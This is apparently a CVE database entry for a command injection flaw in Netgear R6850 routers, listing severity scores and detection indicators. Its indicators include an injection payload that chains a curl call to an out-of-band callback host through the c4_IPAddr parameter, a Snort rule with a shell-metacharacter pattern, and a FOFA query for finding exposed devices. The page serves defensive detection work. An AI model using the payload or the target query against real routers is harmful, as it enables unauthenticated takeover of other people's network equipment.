cbcvebase.
CVE-2024-30568
published 2024-04-03

CVE-2024-30568: Netgear R6850 1.1.0.88 was discovered to contain a command injection vulnerability via the c4-IPAddr parameter.

PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
47.20%
98.7th percentile
Netgear R6850 1.1.0.88 was discovered to contain a command injection vulnerability via the c4-IPAddr parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
netgearr6850_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/setup.cgi?id=0&sp=1337
commandtodo=ping_test&c4_IPAddr=127.0.0.1 && curl {{interactsh-url}}&next_file=diagping.htm
path/setup.cgi
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Netgear R6850 Command Injection via c4_IPAddr Parameter Attempt (CVE-2024-30568)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/setup.cgi|3f|"; startswith; http.request_body; content:"todo|3d|ping_test"; fast_pattern; content:"c4_IPAddr|3d|"; pcre:"/^.*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24)|(?:\x26|%26){2})+/R"; content:"next_file|3d|diagping.htm"; reference:cve,2024-30568; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-30568.yaml; classtype:attempted-admin; sid:2061410; rev:1; metadata:affected_product Netgear_Router, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_04_09, cve CVE_2024_30568, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_04_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets HTTP POST to /setup.cgi with body parameters todo=ping_test and c4_IPAddr containing shell metacharacters (;, newline, backtick, |, $, &&) followed by next_file=diagping.htm
  • The Snort/Suricata PCRE pattern for injection detection in c4_IPAddr body parameter is: /^.*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24)|(?:\x26|%26){2})+/R — matches URL-encoded or raw shell metacharacters after the parameter value
  • Exploitation is unauthenticated; no session cookie or authentication header is required. Detect POST requests to /setup.cgi from unauthenticated sources.
  • Out-of-band callback (DNS/HTTP) to an attacker-controlled server is the primary indicator of successful exploitation; monitor for unexpected outbound DNS/HTTP from router management IPs.
  • FOFA query for identifying exposed targets: app="NETGEAR" && "R6850"
  • ·Vulnerability is only confirmed on firmware version V1.1.0.88; other versions are not listed as affected.
  • ·The Snort rule (sid:2061410) is scoped to plaintext traffic only; TLS-wrapped management interfaces will not be detected by this rule.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.